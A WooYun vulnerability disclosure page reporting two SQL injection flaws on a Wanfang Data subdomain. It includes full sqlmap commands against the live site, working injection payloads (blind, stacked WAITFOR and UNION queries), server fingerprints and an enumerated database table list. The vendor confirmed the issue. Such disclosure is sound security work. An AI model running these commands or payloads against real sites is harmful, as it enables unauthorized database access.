当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120750

漏洞标题:万方某站两处SQL注入

相关厂商:wanfangdata.com.cn

漏洞作者: 路人甲

提交时间:2015-06-16 09:41

修复时间:2015-08-01 12:54

公开时间:2015-08-01 12:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认,细节仅向厂商公开
2015-06-27: 细节向核心白帽子及相关领域专家公开
2015-07-07: 细节向普通白帽子公开
2015-07-17: 细节向实习白帽子公开
2015-08-01: 细节向公众公开

简要描述:

123

详细说明:

第一处注入点:

sqlmap.py -u "http://mingshi.wanfangdata.com.cn/Personal/ScholarResponse.aspx" --data "__VIEWSTATE=iNrZdGRIN3kvd2wPcm9SDvGjBbPE3NBWr9RS94ebuZ9HeDn3s0R0nw50Ggl7MhH1YElPh4DhaqKz5YJ%2FPuBJGWwQYE0WEGDpQXTDSiFgivHx6Zivn%2BTKxj7UdhFan%2Bwt%2F97HvqQyhYf1W7aItPgNV3beFAGkzL54%2FBzFXfN6Do3t4TewOS%2FTMn%2FgR4nV9kaSoU%2BSVbO1NikoUbN8UxBevJVrUdeYynVWF0avNSHUPB4M6zPOVQ%2FOyO91aZdpm9C3QrxMnoWYSA73wjrBCeV3ZvDXwmU3Tj5TtiAx4RUj0dCGUSdq1tkDJDiLkQZxjuD%2FOjn9S4vh6doNX8FTzQzTHAwmNPcea3dAaizPRL%2FDHC43JWiusK10XQo7VVdte2jFxsKpIqOJse3B4Kl6jCWGZBAM2fWfJgXvsUGIiuSr33Oj%2F13udKuoFkATSeSSdPD2VqTfQgkU3cM76mMei3HL%2FUK9mqCuOYcnwj9eoeu90rIgAQyX0S6VjLUXQlqiO%2Buf7%2BUL0bUDPZ2jcTchKkxFa0IpYb84TbOyYQ%2B7U%2F%2FW4psUF9t%2FW%2FX2fYWEEBUdzLD%2BPgQ%2Fvp%2FhPdMQSIZ99S88twRV5%2BhJ0DpNDFl5XE%2BdWpTSNl9NwPatKFsi9sWIIAI%2BdLqM9wxv1aUScZrVjWxo9c%2FjOToS7Ovk%2FVatRgPvYwyWd216H8xE7xgB5ktt0mCUcGLWAMDd1qbdrva80OT8gnxUQiJYBHtMeN1cJNZsEc0ArdIhA5iPEeaNGSBf6d16kimT66F8FDGyznhDJoC6V8HI8MZlw5YD99Im4PXez4nsjWyk6HfopnDh2uTK2D5yMZpDKF8gF5DfWq0nz5xhpgMfpVp6UbDVl4SBXqjFn3sQXHFwdxuc1QwjnMMRagdklBlBdgZN%2B3S%2FLKYFOGmLYhOn7timvBQqRwTgORqL79v7Qh%2FncP56hE2l8O8E9KrApquejXNJh1o3i7r1xkICb3%2BQxzWmyVfhv%2F8Gxu2ThOPjPcUj34Cb0VXaXQ64ZOLnp5YvlKw9CsTrVrcQtypB7HjWpNvyZN0sm2M5RiH0v6tmyJPGG6pjoXRrb98DncEIMgc%2B5thvCRj32liQ%2FZq%2BCvXNS2wjgZO%2FsIi%2BX%2Fd%2BaY6ZYYJTWm9NyQuwct%2Fw5GAIPt1Mvf3%2FuQn58zF%2BOctg7bhlABEtzIh3g2ykIKD%2FNXKfGRWR8IcHbzLBoNcraKVvhWqvQKa83rpGq0MlEXedQpRlCwj%2BYVYCReJC9yqUg7TrYgyNDskFUB9cPy8lG81Cgs2TA8NV0VfamBekaICXFaS1A52Y9zaXGjWt1sP15rPB%2F6b7ll3I4SiDONaIhfOJoNxt3AS%2BOHJoLKxGM7CbnghE6t2Ios4vFz%2B239HGC75RgKTlsUf4cmZzMazSgGzcMNILZ4KvKCOeAc6KO6qWtfIawySTbfsywmq2Is6V1lN83%2FD5jK%2Fs1PCb0OynYNG6cH73oe4LFUX0uaQcHL0ymFqdEQDTSMefz9kH0IC%2FFGC%2FQnzdaosNvqQt5a5pw6n77gIqj8P3DWfTdrpJC2gK%2FUNA8RFFr%2Fd%2FNgQdr1SBbGXlxLntUhozcEcdfjsG8EsL1630H5Kd1bPv7IqPR37DB1w8UQwH007IvXLfl7B5WL8%2FJSKnujfD2iq4wZT1WGmM9zZiVqiEWTG%2F3Q4xczP%2BadVysJtKFHBuziv70XrElCkgdanv46Rf4sImI0LH8AWYQu3tSvJcLoUH6gZpZ3cXzFBmXD%2FIj%2F%2FlMoRX8xNMCWQViGkJVJbusCFM%2FFOe2jw%2BO7Td%2FwlE8Pm32DZ4cyzL1ZunI9VOTejgQ7baq4je2M0BOGts3YFBk5EHU6izETDA8z%2FkgN%2B9cPnmaAx25HglCtqPpJI%3D&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=3ATB46%2FsIFr78ZFkz%2Bw7kvu0nzvLMrI3YW2RYEuwyFrYbvRc9yTcF9UT80SvE4j5GqaurlO1%2BqxoYZmcjhhjvZFZKQbh2uK2QfB0MSsqJeRTGrD%2F&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=88952634"


参数:txtKeyword


1.jpg


2.jpg


3.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtKeyword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=5i49YkAoU5IlVVehBmequT2uKVJK8i+90wHyaprnYJsV8jdW1GMacV7FobdtHG2GryRXcwlNMf3XupfgawKdBUqW8nDvxztNdgOK2StuCXdGKA/L6nkPmY1Q3pOsSfUHPqQU3KMoDrYo1IkspNGehdZ0GJWrp68H4ovXUHf+5GAj2R74Aa7GjhShV8Nn8oAcFsK7m1DBWAGtt2HwAosapmpZWrusNegh1lTTieODvyrLj1KLfeFOb66TOj1yR8SwHnNyQIfx5s9gtoEOkak/hw8/r7ss6puiKLzId9rkl5PQIb8EioqGSn/zerEKf+AfNBLjvvD8c3sehvEv8fKIV/UT46Ci+AmIoqvTDAYOvbYQ7RmFDzjb4itXG2aue3aMHPXqziTiqTcXvCnsXIDOhBkTK3CYMhc+rUwPozg//2cvl446W0ca7DAIcHN20mmXQ8ODWBP4iJsQ+HRDIgL/W6fV7uzf/SR2XY2yswGUfbB6aB5xVll6WNYI42gwHlwKPgt8SJn/Eza8D0k0gX8LnjbpBbcz99yzZxFz1E2umuEwg9PPDBPqdnw7rSYMW3iL0o5PNLeq5r2DjjveOEZff/Q3BiO/7lhSpZNV/iWLZwiUxVzauKRuB7skGSUJORcH5EwS3rZk0pJqVHg57XjfYbyMD4qQ/bOt+Sm5mPzOglnlwee7EHimp0GI9oVfTl8Z0oPWDgNXKUbhaIojmK8LNiXThnbybTyzMHLDaiwNPWfh+E5NzWJ9myckhXx4W97WOTjYEw==&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=G2U9Fw8TXrvDagRSE/WK/xsMhoFhXb4k5g4BATeGfJIspsVZaNdTksOe8NTNvDi7A7lW9J/Uwx0SsF+JjJkT+ZHAUN2C1CZHzcx6/QzxfAldAyoH&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=1%' AND 8224=8224 AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=5i49YkAoU5IlVVehBmequT2uKVJK8i+90wHyaprnYJsV8jdW1GMacV7FobdtHG2GryRXcwlNMf3XupfgawKdBUqW8nDvxztNdgOK2StuCXdGKA/L6nkPmY1Q3pOsSfUHPqQU3KMoDrYo1IkspNGehdZ0GJWrp68H4ovXUHf+5GAj2R74Aa7GjhShV8Nn8oAcFsK7m1DBWAGtt2HwAosapmpZWrusNegh1lTTieODvyrLj1KLfeFOb66TOj1yR8SwHnNyQIfx5s9gtoEOkak/hw8/r7ss6puiKLzId9rkl5PQIb8EioqGSn/zerEKf+AfNBLjvvD8c3sehvEv8fKIV/UT46Ci+AmIoqvTDAYOvbYQ7RmFDzjb4itXG2aue3aMHPXqziTiqTcXvCnsXIDOhBkTK3CYMhc+rUwPozg//2cvl446W0ca7DAIcHN20mmXQ8ODWBP4iJsQ+HRDIgL/W6fV7uzf/SR2XY2yswGUfbB6aB5xVll6WNYI42gwHlwKPgt8SJn/Eza8D0k0gX8LnjbpBbcz99yzZxFz1E2umuEwg9PPDBPqdnw7rSYMW3iL0o5PNLeq5r2DjjveOEZff/Q3BiO/7lhSpZNV/iWLZwiUxVzauKRuB7skGSUJORcH5EwS3rZk0pJqVHg57XjfYbyMD4qQ/bOt+Sm5mPzOglnlwee7EHimp0GI9oVfTl8Z0oPWDgNXKUbhaIojmK8LNiXThnbybTyzMHLDaiwNPWfh+E5NzWJ9myckhXx4W97WOTjYEw==&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=G2U9Fw8TXrvDagRSE/WK/xsMhoFhXb4k5g4BATeGfJIspsVZaNdTksOe8NTNvDi7A7lW9J/Uwx0SsF+JjJkT+ZHAUN2C1CZHzcx6/QzxfAldAyoH&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=1%';WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: __VIEWSTATE=5i49YkAoU5IlVVehBmequT2uKVJK8i+90wHyaprnYJsV8jdW1GMacV7FobdtHG2GryRXcwlNMf3XupfgawKdBUqW8nDvxztNdgOK2StuCXdGKA/L6nkPmY1Q3pOsSfUHPqQU3KMoDrYo1IkspNGehdZ0GJWrp68H4ovXUHf+5GAj2R74Aa7GjhShV8Nn8oAcFsK7m1DBWAGtt2HwAosapmpZWrusNegh1lTTieODvyrLj1KLfeFOb66TOj1yR8SwHnNyQIfx5s9gtoEOkak/hw8/r7ss6puiKLzId9rkl5PQIb8EioqGSn/zerEKf+AfNBLjvvD8c3sehvEv8fKIV/UT46Ci+AmIoqvTDAYOvbYQ7RmFDzjb4itXG2aue3aMHPXqziTiqTcXvCnsXIDOhBkTK3CYMhc+rUwPozg//2cvl446W0ca7DAIcHN20mmXQ8ODWBP4iJsQ+HRDIgL/W6fV7uzf/SR2XY2yswGUfbB6aB5xVll6WNYI42gwHlwKPgt8SJn/Eza8D0k0gX8LnjbpBbcz99yzZxFz1E2umuEwg9PPDBPqdnw7rSYMW3iL0o5PNLeq5r2DjjveOEZff/Q3BiO/7lhSpZNV/iWLZwiUxVzauKRuB7skGSUJORcH5EwS3rZk0pJqVHg57XjfYbyMD4qQ/bOt+Sm5mPzOglnlwee7EHimp0GI9oVfTl8Z0oPWDgNXKUbhaIojmK8LNiXThnbybTyzMHLDaiwNPWfh+E5NzWJ9myckhXx4W97WOTjYEw==&__VIEWSTATEGENERATOR=531CEFC2&__VIEWSTATEENCRYPTED=88952634&__EVENTVALIDATION=G2U9Fw8TXrvDagRSE/WK/xsMhoFhXb4k5g4BATeGfJIspsVZaNdTksOe8NTNvDi7A7lW9J/Uwx0SsF+JjJkT+ZHAUN2C1CZHzcx6/QzxfAldAyoH&Button3=%E6%9F%A5%E8%AF%A2&txtKeyword=1%' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(71)+CHAR(104)+CHAR(67)+CHAR(109)+CHAR(105)+CHAR(75)+CHAR(104)+CHAR(77)+CHAR(116)+CHAR(108)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: WFVideo
[35 tables]
+---------------------+
| AccountLog |
| ArticleCategory |
| ArticleCategory |
| ArticleComment |
| Discount |
| Email |
| GroupDiscount |
| GroupDiscount |
| GroupVideoCategory |
| IPRule |
| MailBoxLog |
| MailBoxLog |
| MeetingScholar |
| MeetingSpace |
| MeetingVideo |
| Operation |
| RoleOperation |
| RoleOperation |
| ScholarSpaceComment |
| ScholarSpaceComment |
| ScholarVideo |
| Tag |
| UnitScholar |
| UnitSpace |
| UnitVideo |
| UserFavorite |
| UserFavorite |
| UserGroup |
| UserRole |
| VideoCategory |
| VideoCategory |
| VideoComment |
| VideoPlayLog |
| VideoTag |
| sysdiagrams |
+---------------------+


第二处:sqlmap.py -u "http://mingshi.wanfangdata.com.cn/Subject.aspx?TagID=18"


参数:TagID


1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: TagID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TagID=18) AND 6837=6837 AND (9602=9602
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: TagID=18);WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'WFVideo'

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-17 12:52

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论